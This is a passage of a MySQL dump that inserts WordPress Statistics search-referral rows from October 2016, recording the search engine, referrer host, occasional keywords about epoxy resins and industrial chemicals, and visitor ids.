INSERT INTO `wp_statistics_search` VALUES (1515, '2016-10-15', 'google', 'www.google.com', '', 4484); 
INSERT INTO `wp_statistics_search` VALUES (1516, '2016-10-15', 'google', 'www.google.com', '', 4489); 
INSERT INTO `wp_statistics_search` VALUES (1517, '2016-10-15', 'google', 'www.google.com', '', 4491); 
INSERT INTO `wp_statistics_search` VALUES (1518, '2016-10-15', 'google', 'www.google.com', '', 4493); 
INSERT INTO `wp_statistics_search` VALUES (1519, '2016-10-15', 'yahoo', 'r.search.yahoo.com', '', 4494); 
INSERT INTO `wp_statistics_search` VALUES (1520, '2016-10-15', 'yahoo', 'r.search.yahoo.com', '', 4503); 
INSERT INTO `wp_statistics_search` VALUES (1521, '2016-10-15', 'google', 'www.google.nl', '', 4507); 
INSERT INTO `wp_statistics_search` VALUES (1522, '2016-10-15', 'google', 'www.google.com', '', 4508); 
INSERT INTO `wp_statistics_search` VALUES (1523, '2016-10-15', 'google', 'www.google.com', '', 4509); 
INSERT INTO `wp_statistics_search` VALUES (1524, '2016-10-15', 'google', 'www.google.com', '', 4516); 
INSERT INTO `wp_statistics_search` VALUES (1525, '2016-10-15', 'google', 'www.google.com', '', 4517); 
INSERT INTO `wp_statistics_search` VALUES (1526, '2016-10-15', 'bing', 'www.bing.com', 'epikure 3140 vs versamid 140', 4519); 
INSERT INTO `wp_statistics_search` VALUES (1527, '2016-10-15', 'google', 'www.google.com', '', 4523); 
INSERT INTO `wp_statistics_search` VALUES (1528, '2016-10-15', 'google', 'www.google.com', '', 4524); 
INSERT INTO `wp_statistics_search` VALUES (1529, '2016-10-16', 'google', 'www.google.com.au', '', 4530); 
INSERT INTO `wp_statistics_search` VALUES (1530, '2016-10-16', 'google', 'www.google.com', '', 4531); 
INSERT INTO `wp_statistics_search` VALUES (1531, '2016-10-16', 'google', 'www.google.com', '', 4539); 
INSERT INTO `wp_statistics_search` VALUES (1532, '2016-10-16', 'google', 'www.google.com', 'H2 oil pan', 4540); 
INSERT INTO `wp_statistics_search` VALUES (1533, '2016-10-16', 'google', 'www.google.com', '', 4548); 
INSERT INTO `wp_statistics_search` VALUES (1534, '2016-10-16', 'google', 'www.google.com', '', 4557); 
INSERT INTO `wp_statistics_search` VALUES (1535, '2016-10-16', 'google', 'www.google.com', '', 4564); 
INSERT INTO `wp_statistics_search` VALUES (1536, '2016-10-16', 'google', 'www.google.com', '', 4569); 
INSERT INTO `wp_statistics_search` VALUES (1537, '2016-10-16', 'google', 'www.google.com', '', 4576); 
INSERT INTO `wp_statistics_search` VALUES (1538, '2016-10-16', 'bing', 'www.bing.com', 'EPIKURE 3234', 4588); 
INSERT INTO `wp_statistics_search` VALUES (1539, '2016-10-16', 'google', 'www.google.co.kr', '', 4595); 
INSERT INTO `wp_statistics_search` VALUES (1540, '2016-10-16', 'google', 'www.google.com.bd', '', 4619); 
INSERT INTO `wp_statistics_search` VALUES (1541, '2016-10-16', 'google', 'www.google.com', '', 4624); 
INSERT INTO `wp_statistics_search` VALUES (1542, '2016-10-16', 'google', 'www.google.ru', '', 4637); 
INSERT INTO `wp_statistics_search` VALUES (1543, '2016-10-16', 'google', 'www.google.sk', '', 4640); 
INSERT INTO `wp_statistics_search` VALUES (1544, '2016-10-16', 'google', 'www.google.ca', '', 4641); 
INSERT INTO `wp_statistics_search` VALUES (1545, '2016-10-16', 'google', 'www.google.com', '', 4660); 
INSERT INTO `wp_statistics_search` VALUES (1546, '2016-10-16', 'google', 'www.google.cat', '2146 resin', 4666); 
INSERT INTO `wp_statistics_search` VALUES (1547, '2016-10-16', 'google', 'www.google.com.mt', '', 4674); 
INSERT INTO `wp_statistics_search` VALUES (1548, '2016-10-16', 'google', 'www.google.com', '', 4677); 
INSERT INTO `wp_statistics_search` VALUES (1549, '2016-10-16', 'google', 'www.google.com', '', 4681); 
INSERT INTO `wp_statistics_search` VALUES (1550, '2016-10-16', 'google', 'www.google.com', '', 4682); 
INSERT INTO `wp_statistics_search` VALUES (1551, '2016-10-16', 'google', 'www.google.com', '', 4691); 
INSERT INTO `wp_statistics_search` VALUES (1552, '2016-10-16', 'google', 'www.google.com', '', 4692); 
INSERT INTO `wp_statistics_search` VALUES (1553, '2016-10-16', 'google', 'www.google.com', '', 4697); 
INSERT INTO `wp_statistics_search` VALUES (1554, '2016-10-16', 'google', 'www.google.com', '', 4698); 
INSERT INTO `wp_statistics_search` VALUES (1555, '2016-10-16', 'google', 'www.google.ca', '', 4705); 
INSERT INTO `wp_statistics_search` VALUES (1556, '2016-10-16', 'google', 'www.google.com', '', 4723); 
INSERT INTO `wp_statistics_search` VALUES (1557, '2016-10-16', 'google', 'www.google.co.in', '', 4726); 
INSERT INTO `wp_statistics_search` VALUES (1558, '2016-10-16', 'google', 'www.google.fr', '', 4737); 
INSERT INTO `wp_statistics_search` VALUES (1559, '2016-10-16', 'google', 'www.google.fi', '', 4754); 
INSERT INTO `wp_statistics_search` VALUES (1560, '2016-10-16', 'google', 'www.google.ca', '', 4758); 
INSERT INTO `wp_statistics_search` VALUES (1561, '2016-10-16', 'google', 'www.google.ca', '', 4759); 
INSERT INTO `wp_statistics_search` VALUES (1562, '2016-10-16', 'google', 'www.google.com', '', 4760); 
INSERT INTO `wp_statistics_search` VALUES (1563, '2016-10-16', 'google', 'www.google.com', '', 4764); 
INSERT INTO `wp_statistics_search` VALUES (1564, '2016-10-16', 'yandex', 'yandex.ru', '', 4770); 
INSERT INTO `wp_statistics_search` VALUES (1565, '2016-10-16', 'google', 'www.google.com', '', 4771); 
INSERT INTO `wp_statistics_search` VALUES (1566, '2016-10-16', 'google', 'www.google.com', '', 4778); 
INSERT INTO `wp_statistics_search` VALUES (1567, '2016-10-16', 'google', 'www.google.com', '', 4779); 
INSERT INTO `wp_statistics_search` VALUES (1568, '2016-10-16', 'google', 'www.google.com', '', 4784); 
INSERT INTO `wp_statistics_search` VALUES (1569, '2016-10-16', 'google', 'www.google.com.au', '', 4786); 
INSERT INTO `wp_statistics_search` VALUES (1570, '2016-10-16', 'google', 'www.google.com', '', 4788); 
INSERT INTO `wp_statistics_search` VALUES (1571, '2016-10-16', 'google', 'www.google.ca', '', 4795); 
INSERT INTO `wp_statistics_search` VALUES (1572, '2016-10-16', 'bing', 'www.bing.com', 'krytox MIL PRF-27617 ', 4798); 
INSERT INTO `wp_statistics_search` VALUES (1573, '2016-10-16', 'google', 'www.google.co.uk', '', 4803); 
INSERT INTO `wp_statistics_search` VALUES (1574, '2016-10-16', 'google', 'www.google.com', '', 4813); 
INSERT INTO `wp_statistics_search` VALUES (1575, '2016-10-16', 'google', 'www.google.it', '', 4815); 
INSERT INTO `wp_statistics_search` VALUES (1576, '2016-10-16', 'google', 'www.google.com', '', 4819); 
INSERT INTO `wp_statistics_search` VALUES (1577, '2016-10-17', 'google', 'www.google.com', '', 4828); 
INSERT INTO `wp_statistics_search` VALUES (1578, '2016-10-17', 'google', 'www.google.com', '', 4830); 
INSERT INTO `wp_statistics_search` VALUES (1579, '2016-10-17', 'bing', 'www.bing.com', ' 57  busıness  company ltd contact us mail', 4832); 
INSERT INTO `wp_statistics_search` VALUES (1580, '2016-10-17', 'google', 'www.google.ca', '', 4833); 
INSERT INTO `wp_statistics_search` VALUES (1581, '2016-10-17', 'google', 'www.google.co.kr', '', 4842); 
INSERT INTO `wp_statistics_search` VALUES (1582, '2016-10-17', 'yahoo', 'r.search.yahoo.com', '', 4845); 
INSERT INTO `wp_statistics_search` VALUES (1583, '2016-10-17', 'google', 'www.google.co.jp', '', 4858); 
INSERT INTO `wp_statistics_search` VALUES (1584, '2016-10-17', 'bing', 'www.bing.com', '', 4859); 
INSERT INTO `wp_statistics_search` VALUES (1585, '2016-10-17', 'google', 'www.google.com', '', 4866); 
INSERT INTO `wp_statistics_search` VALUES (1586, '2016-10-17', 'google', 'www.google.ru', '', 4867); 
INSERT INTO `wp_statistics_search` VALUES (1587, '2016-10-17', 'bing', 'www.bing.com', 'HELOXY Modifier 68 Epoxy Modifier', 4871); 
INSERT INTO `wp_statistics_search` VALUES (1588, '2016-10-17', 'yandex', 'yandex.ru', '', 4874); 
INSERT INTO `wp_statistics_search` VALUES (1589, '2016-10-17', 'bing', 'www.bing.com', 'epoxy curing agents best uv resistance', 4875); 
INSERT INTO `wp_statistics_search` VALUES (1590, '2016-10-17', 'google', 'www.google.co.kr', '', 4876); 
INSERT INTO `wp_statistics_search` VALUES (1591, '2016-10-17', 'google', 'www.google.com.hk', '', 4878); 
INSERT INTO `wp_statistics_search` VALUES (1592, '2016-10-17', 'google', 'www.google.com', '', 4879); 
INSERT INTO `wp_statistics_search` VALUES (1593, '2016-10-17', 'google', 'www.google.com.sg', '', 4882); 
INSERT INTO `wp_statistics_search` VALUES (1594, '2016-10-17', 'google', 'www.google.com', '', 4884); 
INSERT INTO `wp_statistics_search` VALUES (1595, '2016-10-17', 'bing', 'www.bing.com', 'EPON Resin 58034', 4899); 
INSERT INTO `wp_statistics_search` VALUES (1596, '2016-10-17', 'google', 'www.google.com', '', 4902); 
INSERT INTO `wp_statistics_search` VALUES (1597, '2016-10-17', 'google', 'www.google.nl', '', 4903); 
INSERT INTO `wp_statistics_search` VALUES (1598, '2016-10-17', 'google', 'www.google.com.tr', '', 4907); 
INSERT INTO `wp_statistics_search` VALUES (1599, '2016-10-17', 'google', 'www.google.co.kr', '', 4908); 
INSERT INTO `wp_statistics_search` VALUES (1600, '2016-10-17', 'google', 'www.google.co.in', '', 4915); 
INSERT INTO `wp_statistics_search` VALUES (1601, '2016-10-17', 'google', 'www.google.co.kr', '', 4917); 
INSERT INTO `wp_statistics_search` VALUES (1602, '2016-10-17', 'google', 'www.google.co.kr', '', 4918); 
INSERT INTO `wp_statistics_search` VALUES (1603, '2016-10-17', 'google', 'www.google.com.tr', '', 4930); 
INSERT INTO `wp_statistics_search` VALUES (1604, '2016-10-17', 'google', 'www.google.com.sg', '', 4938); 
INSERT INTO `wp_statistics_search` VALUES (1605, '2016-10-17', 'google', 'www.google.co.in', '', 4939); 
INSERT INTO `wp_statistics_search` VALUES (1606, '2016-10-17', 'google', 'www.google.com', '', 4940); 
INSERT INTO `wp_statistics_search` VALUES (1607, '2016-10-17', 'google', 'www.google.co.in', '', 4942); 
INSERT INTO `wp_statistics_search` VALUES (1608, '2016-10-17', 'google', 'www.google.com', '', 4959); 
INSERT INTO `wp_statistics_search` VALUES (1609, '2016-10-17', 'google', 'www.google.ru', '', 4974); 
INSERT INTO `wp_statistics_search` VALUES (1610, '2016-10-17', 'google', 'www.google.nl', '', 4975); 
INSERT INTO `wp_statistics_search` VALUES (1611, '2016-10-17', 'google', 'www.google.com.tr', '', 4982); 
INSERT INTO `wp_statistics_search` VALUES (1612, '2016-10-17', 'google', 'www.google.com', '', 4989); 
INSERT INTO `wp_statistics_search` VALUES (1613, '2016-10-17', 'google', 'www.google.ru', '', 4992); 
INSERT INTO `wp_statistics_search` VALUES (1614, '2016-10-17', 'google', 'www.google.de', '', 4996); 
INSERT INTO `wp_statistics_search` VALUES (1615, '2016-10-17', 'google', 'com.google.android.googlequicksearchbox', '', 4998); 
INSERT INTO `wp_statistics_search` VALUES (1616, '2016-10-17', 'google', 'www.google.com', '', 5015); 
INSERT INTO `wp_statistics_search` VALUES (1617, '2016-10-17', 'google', 'www.google.co.jp', '', 5016); 
INSERT INTO `wp_statistics_search` VALUES (1618, '2016-10-17', 'google', 'www.google.co.uk', '', 5020); 
INSERT INTO `wp_statistics_search` VALUES (1619, '2016-10-17', 'google', 'www.google.co.za', '', 5023); 
INSERT INTO `wp_statistics_search` VALUES (1620, '2016-10-17', 'google', 'www.google.nl', '', 5024); 
INSERT INTO `wp_statistics_search` VALUES (1621, '2016-10-17', 'google', 'www.google.com.eg', '', 5029); 
INSERT INTO `wp_statistics_search` VALUES (1622, '2016-10-17', 'google', 'www.google.co.uk', '', 5034); 
INSERT INTO `wp_statistics_search` VALUES (1623, '2016-10-17', 'google', 'www.google.co.uk', '', 5058); 
INSERT INTO `wp_statistics_search` VALUES (1624, '2016-10-17', 'google', 'www.google.com', '', 5060); 
INSERT INTO `wp_statistics_search` VALUES (1625, '2016-10-17', 'google', 'www.google.fi', '', 5061); 
INSERT INTO `wp_statistics_search` VALUES (1626, '2016-10-17', 'bing', 'www.bing.com', 'MS-122AD difference ms-122xd', 5090); 
INSERT INTO `wp_statistics_search` VALUES (1627, '2016-10-17', 'bing', 'www.bing.com', 'epikure 3223', 5094); 
INSERT INTO `wp_statistics_search` VALUES (1628, '2016-10-17', 'bing', 'www.bing.com', 'miller-stephenson chemical co.ms-143v ptfe mold release ', 5099); 
INSERT INTO `wp_statistics_search` VALUES (1629, '2016-10-17', 'google', 'www.google.com', '', 5101); 
INSERT INTO `wp_statistics_search` VALUES (1630, '2016-10-17', 'google', 'www.google.sk', '', 5104); 
INSERT INTO `wp_statistics_search` VALUES (1631, '2016-10-17', 'google', 'www.google.co.kr', '', 5107); 
INSERT INTO `wp_statistics_search` VALUES (1632, '2016-10-17', 'google', 'www.google.com', '', 5112); 
INSERT INTO `wp_statistics_search` VALUES (1633, '2016-10-17', 'bing', 'www.bing.com', 'Miller-Stephenson MS-220 aero-duster fiche signalitique', 5115); 
INSERT INTO `wp_statistics_search` VALUES (1634, '2016-10-17', 'yahoo', 'r.search.yahoo.com', '', 5116); 
INSERT INTO `wp_statistics_search` VALUES (1635, '2016-10-17', 'google', 'www.google.com', '', 5125); 
INSERT INTO `wp_statistics_search` VALUES (1636, '2016-10-17', 'google', 'www.google.com', '', 5128); 
INSERT INTO `wp_statistics_search` VALUES (1637, '2016-10-17', 'google', 'www.google.com.tr', '', 5129); 
INSERT INTO `wp_statistics_search` VALUES (1638, '2016-10-17', 'google', 'www.google.de', '', 5132); 
INSERT INTO `wp_statistics_search` VALUES (1639, '2016-10-17', 'google', 'www.google.com', '', 5140); 
INSERT INTO `wp_statistics_search` VALUES (1640, '2016-10-17', 'google', 'www.google.se', '', 5141); 
INSERT INTO `wp_statistics_search` VALUES (1641, '2016-10-17', 'google', 'www.google.com', '', 5142); 
INSERT INTO `wp_statistics_search` VALUES (1642, '2016-10-17', 'google', 'www.google.com', '', 5147); 
INSERT INTO `wp_statistics_search` VALUES (1643, '2016-10-17', 'google', 'www.google.com', '', 5150); 
INSERT INTO `wp_statistics_search` VALUES (1644, '2016-10-17', 'google', 'www.google.com', '', 5151); 
INSERT INTO `wp_statistics_search` VALUES (1645, '2016-10-17', 'google', 'www.google.com', '', 5154); 
INSERT INTO `wp_statistics_search` VALUES (1646, '2016-10-17', 'google', 'www.google.com', '', 5159); 
INSERT INTO `wp_statistics_search` VALUES (1647, '2016-10-17', 'google', 'www.google.com', '', 5162); 
INSERT INTO `wp_statistics_search` VALUES (1648, '2016-10-17', 'bing', 'www.bing.com', '', 5169); 
INSERT INTO `wp_statistics_search` VALUES (1649, '2016-10-17', 'google', 'www.google.com', '', 5171); 
INSERT INTO `wp_statistics_search` VALUES (1650, '2016-10-17', 'bing', 'www.bing.com', '', 5172); 
INSERT INTO `wp_statistics_search` VALUES (1651, '2016-10-17', 'google', 'www.google.com', '', 5173); 
INSERT INTO `wp_statistics_search` VALUES (1652, '2016-10-17', 'google', 'www.google.com.tw', '', 5174); 
INSERT INTO `wp_statistics_search` VALUES (1653, '2016-10-17', 'google', 'www.google.com', '', 5176); 
INSERT INTO `wp_statistics_search` VALUES (1654, '2016-10-17', 'google', 'www.google.ca', '', 5177); 
INSERT INTO `wp_statistics_search` VALUES (1655, '2016-10-17', 'google', 'www.google.co.jp', '', 5178); 
INSERT INTO `wp_statistics_search` VALUES (1656, '2016-10-17', 'google', 'www.google.com', '', 5179); 
INSERT INTO `wp_statistics_search` VALUES (1657, '2016-10-17', 'google', 'www.google.de', '', 5180); 
INSERT INTO `wp_statistics_search` VALUES (1658, '2016-10-17', 'google', 'www.google.com', '', 5187); 
INSERT INTO `wp_statistics_search` VALUES (1659, '2016-10-17', 'google', 'www.google.com', '', 5192); 
INSERT INTO `wp_statistics_search` VALUES (1660, '2016-10-17', 'google', 'www.google.com', '', 5193); 
INSERT INTO `wp_statistics_search` VALUES (1661, '2016-10-17', 'google', 'www.google.com', '', 5194); 
INSERT INTO `wp_statistics_search` VALUES (1662, '2016-10-17', 'google', 'www.google.com', '', 5197); 
INSERT INTO `wp_statistics_search` VALUES (1663, '2016-10-17', 'google', 'www.google.com', '', 5198); 
INSERT INTO `wp_statistics_search` VALUES (1664, '2016-10-17', 'google', 'www.google.com', '', 5199); 
INSERT INTO `wp_statistics_search` VALUES (1665, '2016-10-17', 'google', 'www.google.com', '', 5202); 
INSERT INTO `wp_statistics_search` VALUES (1666, '2016-10-17', 'google', 'www.google.ca', '', 5205); 
INSERT INTO `wp_statistics_search` VALUES (1667, '2016-10-17', 'google', 'www.google.ca', '', 5206); 
INSERT INTO `wp_statistics_search` VALUES (1668, '2016-10-17', 'google', 'www.google.com', '', 5209); 
INSERT INTO `wp_statistics_search` VALUES (1669, '2016-10-17', 'google', 'www.google.com', '', 5211); 
INSERT INTO `wp_statistics_search` VALUES (1670, '2016-10-17', 'google', 'www.google.ca', '', 5212); 
INSERT INTO `wp_statistics_search` VALUES (1671, '2016-10-17', 'google', 'www.google.ca', '', 5215); 
INSERT INTO `wp_statistics_search` VALUES (1672, '2016-10-17', 'google', 'www.google.com', '', 5218); 
INSERT INTO `wp_statistics_search` VALUES (1673, '2016-10-17', 'google', 'www.google.com', '', 5221); 
INSERT INTO `wp_statistics_search` VALUES (1674, '2016-10-17', 'google', 'www.google.com', '', 5223); 
INSERT INTO `wp_statistics_search` VALUES (1675, '2016-10-17', 'google', 'www.google.com', '', 5224); 
INSERT INTO `wp_statistics_search` VALUES (1676, '2016-10-17', 'google', 'www.google.com', '', 5225); 
INSERT INTO `wp_statistics_search` VALUES (1677, '2016-10-17', 'google', 'www.google.com', '', 5226); 
INSERT INTO `wp_statistics_search` VALUES (1678, '2016-10-17', 'google', 'www.google.com', '', 5228); 
INSERT INTO `wp_statistics_search` VALUES (1679, '2016-10-17', 'google', 'www.google.ca', '', 5230); 
INSERT INTO `wp_statistics_search` VALUES (1680, '2016-10-17', 'google', 'www.google.com', '', 5232); 
INSERT INTO `wp_statistics_search` VALUES (1681, '2016-10-17', 'google', 'www.google.com', '', 5234); 
INSERT INTO `wp_statistics_search` VALUES (1682, '2016-10-17', 'google', 'www.google.ca', '', 5235); 
INSERT INTO `wp_statistics_search` VALUES (1683, '2016-10-17', 'google', 'www.google.com', '', 5237); 
INSERT INTO `wp_statistics_search` VALUES (1684, '2016-10-17', 'yahoo', 'r.search.yahoo.com', '', 5240); 
INSERT INTO `wp_statistics_search` VALUES (1685, '2016-10-17', 'google', 'www.google.ca', '', 5243); 
INSERT INTO `wp_statistics_search` VALUES (1686, '2016-10-17', 'google', 'www.google.ca', '', 5245); 
INSERT INTO `wp_statistics_search` VALUES (1687, '2016-10-17', 'google', 'www.google.ru', '', 5246); 
INSERT INTO `wp_statistics_search` VALUES (1688, '2016-10-17', 'bing', 'www.bing.com', '', 5248); 
INSERT INTO `wp_statistics_search` VALUES (1689, '2016-10-17', 'google', 'www.google.com', '', 5251); 
INSERT INTO `wp_statistics_search` VALUES (1690, '2016-10-17', 'google', 'www.google.fr', '', 5252); 
INSERT INTO `wp_statistics_search` VALUES (1691, '2016-10-17', 'google', 'www.google.co.uk', '', 5253); 
INSERT INTO `wp_statistics_search` VALUES (1692, '2016-10-17', 'google', 'www.google.co.uk', '', 5254); 
INSERT INTO `wp_statistics_search` VALUES (1693, '2016-10-17', 'google', 'www.google.com', '', 5255); 
INSERT INTO `wp_statistics_search` VALUES (1694, '2016-10-17', 'google', 'www.google.com', '', 5257); 
INSERT INTO `wp_statistics_search` VALUES (1695, '2016-10-17', 'google', 'www.google.com', '', 5269); 
INSERT INTO `wp_statistics_search` VALUES (1696, '2016-10-17', 'google', 'www.google.com', '', 5270); 
INSERT INTO `wp_statistics_search` VALUES (1697, '2016-10-17', 'google', 'www.google.com', '', 5272); 
INSERT INTO `wp_statistics_search` VALUES (1698, '2016-10-17', 'google', 'www.google.com', '', 5276); 
INSERT INTO `wp_statistics_search` VALUES (1699, '2016-10-17', 'google', 'www.google.com', '', 5278); 
INSERT INTO `wp_statistics_search` VALUES (1700, '2016-10-17', 'bing', 'www.bing.com', 'hexion epoxy hardener', 5279); 
INSERT INTO `wp_statistics_search` VALUES (1701, '2016-10-17', 'google', 'www.google.com', '', 5280); 
INSERT INTO `wp_statistics_search` VALUES (1702, '2016-10-17', 'google', 'www.google.com', '', 5284); 
INSERT INTO `wp_statistics_search` VALUES (1703, '2016-10-17', 'google', 'www.google.com.mx', '', 5288); 
INSERT INTO `wp_statistics_search` VALUES (1704, '2016-10-17', 'google', 'www.google.com', '', 5289); 
INSERT INTO `wp_statistics_search` VALUES (1705, '2016-10-17', 'google', 'www.google.com', '', 5290); 
INSERT INTO `wp_statistics_search` VALUES (1706, '2016-10-17', 'google', 'www.google.ca', '', 5296); 
INSERT INTO `wp_statistics_search` VALUES (1707, '2016-10-17', 'google', 'www.google.com', '', 5299); 
INSERT INTO `wp_statistics_search` VALUES (1708, '2016-10-17', 'google', 'www.google.com', '', 5302); 
INSERT INTO `wp_statistics_search` VALUES (1709, '2016-10-17', 'google', 'www.google.es', '', 5304); 
INSERT INTO `wp_statistics_search` VALUES (1710, '2016-10-17', 'google', 'www.google.ca', '', 5307); 
INSERT INTO `wp_statistics_search` VALUES (1711, '2016-10-17', 'google', 'www.google.com', '', 5309); 
INSERT INTO `wp_statistics_search` VALUES (1712, '2016-10-17', 'google', 'www.google.com', '', 5310); 
INSERT INTO `wp_statistics_search` VALUES (1713, '2016-10-17', 'google', 'www.google.ca', '', 5312); 
INSERT INTO `wp_statistics_search` VALUES (1714, '2016-10-17', 'google', 'www.google.com', '', 5313); 
INSERT INTO `wp_statistics_search` VALUES (1715, '2016-10-17', 'google', 'www.google.com', '', 5315); 
INSERT INTO `wp_statistics_search` VALUES (1716, '2016-10-17', 'google', 'www.google.com', '', 5317); 
INSERT INTO `wp_statistics_search` VALUES (1717, '2016-10-17', 'google', 'www.google.com', '', 5319); 
INSERT INTO `wp_statistics_search` VALUES (1718, '2016-10-17', 'google', 'www.google.com', '', 5320); 
INSERT INTO `wp_statistics_search` VALUES (1719, '2016-10-17', 'google', 'www.google.com', '', 5329); 
INSERT INTO `wp_statistics_search` VALUES (1720, '2016-10-17', 'google', 'www.google.ca', '', 5330); 
INSERT INTO `wp_statistics_search` VALUES (1721, '2016-10-17', 'google', 'www.google.com', '', 5333); 
INSERT INTO `wp_statistics_search` VALUES (1722, '2016-10-17', 'google', 'www.google.co.uk', '', 5338); 
INSERT INTO `wp_statistics_search` VALUES (1723, '2016-10-17', 'google', 'www.google.com', '', 5340); 
INSERT INTO `wp_statistics_search` VALUES (1724, '2016-10-17', 'google', 'www.google.com', '', 5342); 
INSERT INTO `wp_statistics_search` VALUES (1725, '2016-10-17', 'yahoo', 'r.search.yahoo.com', '', 5344); 
INSERT INTO `wp_statistics_search` VALUES (1726, '2016-10-17', 'google', 'www.google.com', '', 5345); 
INSERT INTO `wp_statistics_search` VALUES (1727, '2016-10-17', 'google', 'www.google.com', '', 5346); 
INSERT INTO `wp_statistics_search` VALUES (1728, '2016-10-17', 'google', 'www.google.com', '', 5347); 
INSERT INTO `wp_statistics_search` VALUES (1729, '2016-10-17', 'google', 'www.google.com', '', 5349); 
INSERT INTO `wp_statistics_search` VALUES (1730, '2016-10-17', 'google', 'www.google.com', '', 5350); 
INSERT INTO `wp_statistics_search` VALUES (1731, '2016-10-17', 'google', 'www.google.com', 'least expensive food grade oil', 5352); 
INSERT INTO `wp_statistics_search` VALUES (1732, '2016-10-17', 'google', 'www.google.com', '', 5357); 
INSERT INTO `wp_statistics_search` VALUES (1733, '2016-10-17', 'google', 'www.google.com', '', 5360); 
INSERT INTO `wp_statistics_search` VALUES (1734, '2016-10-17', 'google', 'www.google.com', '', 5361); 
INSERT INTO `wp_statistics_search` VALUES (1735, '2016-10-17', 'google', 'www.google.com', '', 5363); 
INSERT INTO `wp_statistics_search` VALUES (1736, '2016-10-17', 'google', 'www.google.com', '', 5367); 
INSERT INTO `wp_statistics_search` VALUES (1737, '2016-10-17', 'google', 'www.google.com', '', 5368); 
INSERT INTO `wp_statistics_search` VALUES (1738, '2016-10-17', 'bing', 'www.bing.com', 'chart of all conformal coatings ', 5371); 
INSERT INTO `wp_statistics_search` VALUES (1739, '2016-10-17', 'google', 'www.google.com', '', 5372); 
INSERT INTO `wp_statistics_search` VALUES (1740, '2016-10-17', 'google', 'www.google.com', '', 5374); 
INSERT INTO `wp_statistics_search` VALUES (1741, '2016-10-17', 'google', 'www.google.co.nz', '', 5375); 
INSERT INTO `wp_statistics_search` VALUES (1742, '2016-10-17', 'google', 'www.google.com', '', 5376); 
INSERT INTO `wp_statistics_search` VALUES (1743, '2016-10-17', 'yahoo', 'r.search.yahoo.com', '', 5377); 
INSERT INTO `wp_statistics_search` VALUES (1744, '2016-10-17', 'google', 'www.google.com.au', '', 5385); 
INSERT INTO `wp_statistics_search` VALUES (1745, '2016-10-17', 'google', 'www.google.com', '', 5386); 
INSERT INTO `wp_statistics_search` VALUES (1746, '2016-10-17', 'google', 'www.google.com', '', 5389); 
INSERT INTO `wp_statistics_search` VALUES (1747, '2016-10-17', 'google', 'www.google.com', '', 5391); 
INSERT INTO `wp_statistics_search` VALUES (1748, '2016-10-17', 'bing', 'www.bing.com', 'miller silicone oil', 5394); 
INSERT INTO `wp_statistics_search` VALUES (1749, '2016-10-17', 'google', 'www.google.com', '', 5397); 
INSERT INTO `wp_statistics_search` VALUES (1750, '2016-10-17', 'google', 'www.google.com', '', 5399); 
INSERT INTO `wp_statistics_search` VALUES (1751, '2016-10-17', 'google', 'www.google.com', '', 5403); 
INSERT INTO `wp_statistics_search` VALUES (1752, '2016-10-17', 'google', 'www.google.com', '', 5404); 
INSERT INTO `wp_statistics_search` VALUES (1753, '2016-10-17', 'google', 'www.google.com', '', 5408); 
INSERT INTO `wp_statistics_search` VALUES (1754, '2016-10-17', 'google', 'www.google.com', '', 5409); 
INSERT INTO `wp_statistics_search` VALUES (1755, '2016-10-17', 'google', 'www.google.com', '', 5411); 
INSERT INTO `wp_statistics_search` VALUES (1756, '2016-10-17', 'google', 'www.google.nl', '', 5422); 
INSERT INTO `wp_statistics_search` VALUES (1757, '2016-10-17', 'google', 'www.google.nl', '', 5423); 
INSERT INTO `wp_statistics_search` VALUES (1758, '2016-10-17', 'google', 'www.google.com', '', 5427); 
INSERT INTO `wp_statistics_search` VALUES (1759, '2016-10-17', 'google', 'www.google.com.au', '', 5434); 
INSERT INTO `wp_statistics_search` VALUES (1760, '2016-10-17', 'google', 'www.google.com.au', '', 5436); 
INSERT INTO `wp_statistics_search` VALUES (1761, '2016-10-18', 'google', 'www.google.com', '', 5442); 
INSERT INTO `wp_statistics_search` VALUES (1762, '2016-10-18', 'google', 'www.google.co.nz', '', 5446); 
INSERT INTO `wp_statistics_search` VALUES (1763, '2016-10-18', 'google', 'www.google.ca', '', 5451); 
INSERT INTO `wp_statistics_search` VALUES (1764, '2016-10-18', 'google', 'www.google.com.sg', '', 5457); 
INSERT INTO `wp_statistics_search` VALUES (1765, '2016-10-18', 'google', 'www.google.com', '', 5466); 
INSERT INTO `wp_statistics_search` VALUES (1766, '2016-10-18', 'google', 'www.google.com.au', '', 5469); 
INSERT INTO `wp_statistics_search` VALUES (1767, '2016-10-18', 'google', 'www.google.com', '', 5472); 
INSERT INTO `wp_statistics_search` VALUES (1768, '2016-10-18', 'google', 'www.google.az', '', 5473); 
INSERT INTO `wp_statistics_search` VALUES (1769, '2016-10-18', 'google', 'www.google.ca', '', 5475); 
INSERT INTO `wp_statistics_search` VALUES (1770, '2016-10-18', 'google', 'www.google.co.jp', '', 5478); 
INSERT INTO `wp_statistics_search` VALUES (1771, '2016-10-18', 'google', 'www.google.com.tw', '', 5483); 
INSERT INTO `wp_statistics_search` VALUES (1772, '2016-10-18', 'google', 'www.google.com', '', 5484); 
INSERT INTO `wp_statistics_search` VALUES (1773, '2016-10-18', 'google', 'www.google.com', '', 5508); 
INSERT INTO `wp_statistics_search` VALUES (1774, '2016-10-18', 'google', 'www.google.com', '', 5511); 
INSERT INTO `wp_statistics_search` VALUES (1775, '2016-10-18', 'google', 'www.google.com.au', '', 5513); 
INSERT INTO `wp_statistics_search` VALUES (1776, '2016-10-18', 'google', 'www.google.co.in', '', 5518); 
INSERT INTO `wp_statistics_search` VALUES (1777, '2016-10-18', 'google', 'www.google.com', '', 5522); 
INSERT INTO `wp_statistics_search` VALUES (1778, '2016-10-18', 'google', 'www.google.co.jp', '', 5528); 
INSERT INTO `wp_statistics_search` VALUES (1779, '2016-10-18', 'google', 'www.google.com', '', 5533); 
INSERT INTO `wp_statistics_search` VALUES (1780, '2016-10-18', 'google', 'www.google.com', '', 5553); 
INSERT INTO `wp_statistics_search` VALUES (1781, '2016-10-18', 'google', 'www.google.com.sg', '', 5560); 
INSERT INTO `wp_statistics_search` VALUES (1782, '2016-10-18', 'google', 'www.google.se', '', 5565); 
INSERT INTO `wp_statistics_search` VALUES (1783, '2016-10-18', 'google', 'www.google.com', '', 5570); 
INSERT INTO `wp_statistics_search` VALUES (1784, '2016-10-18', 'google', 'www.google.co.uk', '', 5577); 
INSERT INTO `wp_statistics_search` VALUES (1785, '2016-10-18', 'google', 'www.google.de', '', 5579); 
INSERT INTO `wp_statistics_search` VALUES (1786, '2016-10-18', 'google', 'www.google.pl', '', 5580); 
INSERT INTO `wp_statistics_search` VALUES (1787, '2016-10-18', 'google', 'www.google.co.za', '', 5581); 
